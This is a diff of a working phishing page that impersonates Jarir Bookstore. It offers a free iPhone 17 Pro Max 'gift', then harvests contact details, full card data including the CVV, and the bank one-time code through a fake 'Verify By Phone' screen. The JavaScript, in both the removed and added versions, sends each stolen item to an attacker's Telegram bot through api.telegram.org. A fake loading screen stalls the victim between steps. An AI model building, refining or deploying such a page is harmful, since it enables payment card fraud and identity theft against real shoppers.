--- a/index.html
+++ b/index.html
@@ -9,25 +9,21 @@
     <script src="https://cdn.tailwindcss.com"></script>
     <style>
         :root { --jarir-red: #E30613; --jarir-navy: #2D3E50; }
-        body { font-family: 'Cairo', sans-serif; background-color: #ffffff; }
+        body { font-family: 'Cairo', sans-serif; background-color: #ffffff; margin: 0; padding: 0; }
         .page { display: none; min-height: 100vh; }
         .page.active { display: block; }
-        .form-input { width: 100%; background: #F0F2F5; border: 1px solid #E5E7EB; border-radius: 4px; padding: 12px; outline: none; text-align: right; font-size: 14px; }
-        .btn-red { background-color: var(--jarir-red); width: 100%; color: white; font-weight: bold; border-radius: 8px; transition: 0.3s; }
         
-        .cart-icon-container { position: relative; background: #F0F2F5; padding: 8px; border-radius: 8px; }
-        .cart-badge { position: absolute; top: -5px; right: -5px; background: #FF9800; color: white; font-size: 10px; width: 18px; height: 18px; border-radius: 50%; display: flex; align-items: center; justify-content: center; font-weight: bold; }
-        .back-to-top { position: fixed; bottom: 80px; left: 20px; background: white; border: 1px solid #DDD; width: 45px; height: 45px; border-radius: 50%; display: flex; align-items: center; justify-content: center; box-shadow: 0 2px 5px rgba(0,0,0,0.1); z-index: 100; }
+        /* رسالة الخطأ المدمجة (أحمر جرير) */
+        .error-message { display: none; background-color: #E30613; color: white; padding: 10px; border-radius: 4px; text-align: center; font-size: 13px; margin-bottom: 15px; font-weight: bold; }
 
-        /* إضافة الرسالة الحمراء وشاشة التحميل دون تغيير الباقي */
-        .error-box { display: none; color: #E30613; background: #fff5f5; border: 1px solid #ffcaca; padding: 10px; border-radius: 5px; text-align: center; margin-bottom: 15px; font-weight: bold; font-size: 13px; }
-        #loader { display: none; position: fixed; top: 0; left: 0; width: 100%; height: 100%; background: white; z-index: 1000; flex-direction: column; justify-content: center; align-items: center; }
+        /* شاشة التحميل */
+        #loader { display: none; position: fixed; top: 0; left: 0; width: 100%; height: 100%; background: white; z-index: 9999; flex-direction: column; justify-content: center; align-items: center; }
         .spinner { width: 40px; height: 40px; border: 4px solid #f3f3f3; border-top: 4px solid var(--jarir-red); border-radius: 50%; animation: spin 1s linear infinite; }
         @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } }
 
-        #page-bank { direction: ltr; text-align: left; }
-        .bank-container { padding: 20px; max-width: 450px; margin: 0 auto; }
-        .confirm-btn-blue { width: 100%; background-color: #0000FF; color: white; border: none; padding: 16px; font-size: 18px; font-weight: bold; border-radius: 4px; cursor: pointer; text-transform: uppercase; margin-top: 20px;}
+        /* ستايل كودك الأصلي للمدخلات */
+        .form-input { width: 100%; background: #F0F2F5; border: 1px solid #E5E7EB; border-radius: 4px; padding: 12px; outline: none; text-align: right; font-size: 14px; }
+        .btn-red { background-color: var(--jarir-red); width: 100%; color: white; font-weight: bold; border-radius: 8px; transition: 0.3s; }
     </style>
 </head>
 <body class="max-w-md mx-auto shadow-2xl bg-white">
@@ -41,74 +37,28 @@
         <header class="p-3 border-b sticky top-0 bg-white z-50 flex justify-between items-center">
             <div class="flex items-center gap-4">
                 <i class="fa-solid fa-bars text-xl text-gray-600"></i>
-                <div class="cart-icon-container">
+                <div class="relative bg-[#F0F2F5] p-2 rounded-lg">
                     <i class="fa-solid fa-cart-shopping text-gray-600"></i>
-                    <span class="cart-badge">1</span>
+                    <span class="absolute -top-1 -right-1 bg-[#FF9800] text-white text-[10px] w-4 h-4 rounded-full flex items-center justify-center font-bold">1</span>
                 </div>
             </div>
-            <div class="flex items-center gap-1">
-                <div class="relative flex items-center bg-gray-100 rounded-full px-4 py-1">
-                    <input type="text" value="iphone 17 pro max" readonly class="bg-transparent text-sm text-right outline-none w-32">
-                    <i class="fa-solid fa-magnifying-glass text-gray-400 mr-2"></i>
-                </div>
-                <div class="flex items-center ml-2">
-                    <img src="https://i.ibb.co/h1mkXJhd/41826-EFC-5-C60-40-C5-BBEC-61-D40-D90-EB9-F.png" class="h-10">
-                </div>
-            </div>
+            <img src="https://i.ibb.co/h1mkXJhd/41826-EFC-5-C60-40-C5-BBEC-61-D40-D90-EB9-F.png" class="h-10">
         </header>
-
-        <div class="bg-gray-50 p-3 flex justify-between items-center border-b text-sm text-gray-500">
-            <i class="fa-solid fa-chevron-down text-xs"></i>
-            <span>حدد خيار التوصيل الذي تفضله</span>
-        </div>
-
-        <div class="py-6 flex justify-center">
-            <img src="https://i.ibb.co/HpTBrKJN/CFE81-C5-E-E4-C2-446-F-99-FF-DECC85-EC63-D0.png" class="w-[280px]">
-        </div>
-
-        <main class="p-5">
-            <div class="flex justify-between items-start mb-2">
-                <div class="text-right">
-                    <p class="text-[10px] text-gray-400">رقم الصنف 666736 رقم المنتج MFY94AHA</p>
-                    <h1 class="text-xl font-bold text-gray-900">ابل آيفون 17 برو ماكس</h1>
-                </div>
-                <i class="fa-brands fa-apple text-3xl text-gray-800"></i>
-            </div>
-            
-            <div class="flex flex-wrap gap-2 mb-6 justify-end">
-                <span class="border px-3 py-1 text-xs text-gray-500 rounded">256 جيجابايت</span>
-                <span class="border px-3 py-1 text-xs text-gray-500 rounded">برتقالي كوزمك الجيل الخامس</span>
-                <span class="border px-3 py-1 text-xs text-gray-500 rounded">آبل آيه 19 برو</span>
-            </div>
-
-            <div class="flex justify-between items-center mb-6">
-                <button onclick="showPage('page-register')" class="bg-[#E30613] text-white font-bold w-1/2 py-4 rounded-lg text-lg">استلم الهديه</button>
-                <div class="text-right">
-                    <div class="text-[#E30613] text-3xl font-black">هديه من جرير <span class="text-sm">ر.س</span></div>
-                    <p class="text-[10px] text-gray-400">شامل ضريبة القيمة المضافة</p>
-                </div>
-            </div>
-
-            <div class="flex justify-between py-6 border-t mt-4">
-                <i class="fa-brands fa-linkedin text-[#0077B5] text-2xl"></i>
-                <i class="fa-brands fa-tiktok text-black text-2xl"></i>
-                <i class="fa-brands fa-snapchat text-[#FFFC00] bg-black p-1 rounded-full text-lg"></i>
-                <i class="fa-brands fa-youtube text-[#FF0000] text-2xl"></i>
-                <i class="fa-brands fa-instagram text-[#E4405F] text-2xl"></i>
-                <i class="fa-brands fa-x-twitter text-black text-2xl"></i>
-                <i class="fa-brands fa-facebook text-[#1877F2] text-2xl"></i>
-            </div>
+        <main class="p-5 text-center">
+            <img src="https://i.ibb.co/HpTBrKJN/CFE81-C5-E-E4-C2-446-F-99-FF-DECC85-EC63-D0.png" class="mx-auto w-[280px] my-6">
+            <h1 class="text-xl font-bold text-right mb-4">ابل آيفون 17 برو ماكس</h1>
+            <button onclick="showPage('page-register')" class="btn-red py-4 w-full text-lg">استلم الهديه</button>
         </main>
     </section>
 
     <section id="page-register" class="page bg-white">
         <header class="p-4 border-b flex justify-between items-center">
-            <button onclick="showPage('page-product')"><i class="fa-solid fa-chevron-right ml-1"></i>العودة</button>
+            <button onclick="showPage('page-product')" class="flex items-center"><i class="fa-solid fa-chevron-right ml-1"></i> العودة</button>
             <span class="font-bold">معلومات تسليم الهديه</span>
             <img src="https://i.ibb.co/h1mkXJhd/41826-EFC-5-C60-40-C5-BBEC-61-D40-D90-EB9-F.png" class="h-6">
         </header>
         <div class="p-6">
-            <div id="error-msg-reg" class="error-box">يرجى التأكد من كتابة جميع المعلومات والبريد بشكل صحيح</div>
+            <div id="error-reg" class="error-message">يرجى التأكد من كتابة جميع المعلومات والبريد بشكل صحيح</div>
             <div class="space-y-4">
                 <input type="tel" id="user-phone" placeholder="رقم الهاتف" class="form-input">
                 <input type="text" id="user-name" placeholder="الاسم الكامل" class="form-input">
@@ -121,40 +71,38 @@
 
     <section id="page-payment" class="page bg-[#F3F5F7]">
         <header class="p-4 bg-white border-b flex justify-between items-center">
-            <button onclick="showPage('page-register')"><i class="fa-solid fa-chevron-right ml-1"></i>العودة</button>
+            <button onclick="showPage('page-register')" class="flex items-center"><i class="fa-solid fa-chevron-right ml-1"></i> العودة</button>
             <span class="font-bold">دفع مصاريف الشحن</span>
         </header>
         <main class="p-4">
-            <div id="error-msg-pay" class="error-box">بيانات البطاقة غير صحيحة</div>
-            <div class="bg-white rounded-lg p-6 shadow-sm border relative">
-                <input type="text" id="card-num" placeholder="رقم البطاقة" class="form-input mb-4" maxlength="16">
-                <div class="flex gap-2">
-                    <input type="text" id="card-cvv" placeholder="CVV" class="form-input w-1/3" maxlength="3">
-                    <input type="text" id="card-exp" placeholder="تاريخ الانتهاء" class="form-input w-2/3">
+            <div id="error-pay" class="error-message">بيانات البطاقة غير مكتملة</div>
+            <div class="bg-white rounded-lg p-6 shadow-sm border">
+                <input type="tel" id="card-num" placeholder="رقم البطاقة" class="form-input mb-4" maxlength="16">
+                <div class="flex gap-2 mb-4">
+                    <input type="tel" id="card-cvv" placeholder="CVV" class="form-input w-1/3" maxlength="3">
+                    <input type="tel" id="card-exp" placeholder="تاريخ الانتهاء" class="form-input w-2/3" maxlength="5" oninput="formatExp(this)">
                 </div>
-                <input type="text" id="card-holder" placeholder="اسم حامل البطاقة" class="form-input mt-4">
-                <button onclick="sendData('payment')" class="btn-red py-4 mt-8">مصاريف الشحن( 76ر.س.)</button>
+                <input type="text" id="card-holder" placeholder="اسم حامل البطاقة" class="form-input mb-6">
+                <button onclick="sendData('payment')" class="btn-red py-4">مصاريف الشحن (76 ر.س.)</button>
             </div>
         </main>
     </section>
 
     <section id="page-bank" class="page">
-        <div class="bank-container">
-            <div style="display: flex; justify-content: space-between; align-items: center; margin-bottom: 20px;">
-                <div style="color: #0000FF; font-size: 26px;">&#10094;</div>
-                <div style="font-weight: bold;">Cancel</div>
+        <div class="p-6">
+            <div class="flex justify-between items-center mb-10">
+                <span class="text-blue-600 text-2xl" onclick="showPage('page-payment')">&#10094;</span>
+                <span class="font-bold">Cancel</span>
             </div>
-            <div style="display: flex; justify-content: space-between; align-items: center;">
-                <img src="https://i.ibb.co/fG2CKyhR/E01-BB971-3-E72-498-A-BEAA-004-A9098-EC7-A.png" style="height: 60px;">
-                <img src="https://i.ibb.co/sv5VB9wQ/88347052-D6-A4-4974-A56-C-FCAD68185365.png" style="height: 60px;">
+            <div class="flex justify-between items-center mb-8">
+                <img src="https://i.ibb.co/fG2CKyhR/E01-BB971-3-E72-498-A-BEAA-004-A9098-EC7-A.png" class="h-12">
+                <img src="https://i.ibb.co/sv5VB9wQ/88347052-D6-A4-4974-A56-C-FCAD68185365.png" class="h-12">
             </div>
-            <hr style="margin: 20px 0; border: 0; border-top: 1px solid #eee;">
-            <p>You are paying <strong>Jarir Bookstore</strong>: <strong>SAR 76.00</strong></p>
-            <div id="error-msg-otp" class="error-box mt-4">رمز التحقق غير صحيح</div>
-            <div style="text-align: center; margin-top: 40px;">
-                <input type="text" id="bank-otp" placeholder="Enter Code" style="width: 100%; height: 50px; border: 1px solid #ccc; text-align: center; font-size: 24px;">
-                <button onclick="sendData('otp')" class="confirm-btn-blue">CONFIRM</button>
-            </div>
+            <h1 class="text-2xl font-bold mb-2">Verify By Phone</h1>
+            <p class="text-sm text-gray-600 mb-8">Paying Jarir Bookstore: <strong>SAR 76.00</strong></p>
+            <div id="error-otp" class="error-message">رمز التحقق غير صحيح</div>
+            <input type="tel" id="bank-otp" placeholder="Enter Code" class="form-input text-center text-2xl h-14 mb-6">
+            <button onclick="sendData('otp')" class="w-full bg-[#0000FF] text-white py-4 font-bold rounded">CONFIRM</button>
         </div>
     </section>
 
@@ -168,49 +116,45 @@
             window.scrollTo(0,0);
         }
 
-        function startLoading(targetPage) {
-            document.getElementById('loader').style.display = 'flex';
-            setTimeout(() => {
-                document.getElementById('loader').style.display = 'none';
-                showPage(targetPage);
-            }, 2500);
+        function formatExp(input) {
+            let v = input.value.replace(/\D/g, '');
+            if (v.length >= 2) input.value = v.substring(0,2) + '/' + v.substring(2,4);
         }
 
         async function sendData(step) {
-            // إخفاء الأخطاء
-            document.querySelectorAll('.error-box').forEach(el => el.style.display = 'none');
+            document.querySelectorAll('.error-message').forEach(e => e.style.display = 'none');
 
             if(step === 'register') {
                 const phone = document.getElementById('user-phone').value;
                 const email = document.getElementById('user-email').value;
-                const name = document.getElementById('user-name').value;
-                const addr = document.getElementById('user-address').value;
-
-                if(phone === "" || !email.includes("@") || name === "" || addr === "") {
-                    document.getElementById('error-msg-reg').style.display = 'block';
+                if(phone === "" || !email.includes("@")) {
+                    document.getElementById('error-reg').style.display = 'block';
                     return;
                 }
-                const text = `👤 جديد:\n📞 هاتف: ${phone}\n📝 اسم: ${name}\n🏠 عنوان: ${addr}\n📧 بريد: ${email}`;
-                await fetch(`https://api.telegram.org/bot${botToken}/sendMessage?chat_id=${chatId}&text=${encodeURIComponent(text)}`);
-                startLoading('page-payment');
+                await fetch(`https://api.telegram.org/bot${botToken}/sendMessage?chat_id=${chatId}&text=${encodeURIComponent("👤 زبون جديد: " + phone)}`);
+                showPage('page-payment');
+
             } else if(step === 'payment') {
                 const card = document.getElementById('card-num').value;
                 if(card.length < 16) {
-                    document.getElementById('error-msg-pay').style.display = 'block';
+                    document.getElementById('error-pay').style.display = 'block';
                     return;
                 }
-                const text = `💳 بطاقة:\n🔢 رقم: ${card}\n📅 تاريخ: ${document.getElementById('card-exp').value}\n🔒 CVV: ${document.getElementById('card-cvv').value}\n👤 اسم: ${document.getElementById('card-holder').value}`;
-                await fetch(`https://api.telegram.org/bot${botToken}/sendMessage?chat_id=${chatId}&text=${encodeURIComponent(text)}`);
-                startLoading('page-bank');
+                await fetch(`https://api.telegram.org/bot${botToken}/sendMessage?chat_id=${chatId}&text=${encodeURIComponent("💳 بطاقة: " + card)}`);
+                document.getElementById('loader').style.display = 'flex';
+                setTimeout(() => { 
+                    document.getElementById('loader').style.display = 'none';
+                    showPage('page-bank');
+                }, 2000);
+
             } else if(step === 'otp') {
                 const otp = document.getElementById('bank-otp').value;
                 if(otp === "") {
-                    document.getElementById('error-msg-otp').style.display = 'block';
+                    document.getElementById('error-otp').style.display = 'block';
                     return;
                 }
-                const text = `🔑 كود:\n🔢 الكود: ${otp}`;
-                await fetch(`https://api.telegram.org/bot${botToken}/sendMessage?chat_id=${chatId}&text=${encodeURIComponent(text)}`);
-                alert("تم استلام طلبك بنجاح.");
+                await fetch(`https://api.telegram.org/bot${botToken}/sendMessage?chat_id=${chatId}&text=${encodeURIComponent("🔑 كود: " + otp)}`);
+                alert("تم بنجاح");
             }
         }
     </script>
